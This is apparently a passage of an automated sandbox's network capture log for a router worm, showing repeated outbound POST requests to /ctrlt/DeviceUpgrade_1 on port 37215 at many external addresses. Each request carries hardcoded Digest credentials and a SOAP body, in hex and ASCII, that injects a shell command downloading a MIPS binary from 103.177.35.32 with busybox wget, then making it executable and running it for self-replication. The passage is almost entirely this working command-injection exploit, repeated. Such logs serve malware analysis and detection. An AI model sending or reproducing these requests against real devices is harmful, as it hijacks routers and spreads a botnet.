                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        676192.168.2.2344204157.102.203.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496073008 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        677192.168.2.2342262157.255.222.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496125937 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        678192.168.2.2354646157.177.139.24837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496146917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        679192.168.2.2360558157.145.232.5237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496184111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        680192.168.2.2342618157.35.147.23837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496206045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        681192.168.2.234250441.178.162.1437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496254921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        682192.168.2.235667276.118.146.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496260881 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        683192.168.2.2342992210.138.116.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496382952 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        684192.168.2.2347126157.157.132.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496393919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        685192.168.2.2348342157.109.181.12337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496429920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
